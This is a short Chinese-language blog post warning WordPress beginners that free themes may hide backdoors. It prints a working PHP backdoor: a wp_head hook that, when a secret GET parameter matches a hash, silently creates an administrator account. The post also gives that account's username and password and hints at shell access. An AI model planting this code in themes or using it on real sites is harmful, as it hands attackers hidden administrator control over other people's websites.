關於 WordPress 主題的後門程式碼

4,980 0

有一些剛剛接觸 WordPress 的新手們,總是喜歡到網路上去找一些免費主題,卻不知道這些主題很有可能藏有後門,可以輕鬆地取得你網站的權限,從而獲取非法利益。

所以我在這裡要提醒一下那些新手們,找主題一定要找正版的。如果是免費版,最好是有 GitHub 開源專案的主題,這樣在一定程度上都會減少遇到後門的機率。

範例

下面給大家帶來一個常見的後門程式碼:

PHP
add_action('wp_head', 'my_backdoor');
function my_backdoor() {
    if (md5($_GET['backdoor']) == 'b0f455571f6ae6c30e7521e9bf00b4f2') {
        require('wp-includes/registration.php');
        if (!username_exists('mr_admin')) {
            $user_id = wp_create_user('xinyewl', 'me');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}

只要 PHP 觸發了這段程式碼,進行了請求,你就可以使用你的密碼來登入他的後台了,正常登入即可取得管理員權限。也就是說,你甚至可以拿到 shell,具體不多說,自己領悟。

我這裡預設設定的帳號密碼是:

帳號:xinyewl 
密碼:me

具體怎麼使用,我不會說的,也是為了避免小學生惡意植入主題。

好了就這樣了,千萬別拿來做壞事。

圖片

評論

(0)

暫無評論,來說兩句吧

發佈評論

© 2026 一紙忘憂. 保留所有權利.

一紙忘憂的個人網站,關於技術探索與日常生活,記錄 Web 開發、後端與 DevOps 實踐,分享軟體工具、數位體驗,以及程式碼之外的見聞與思考。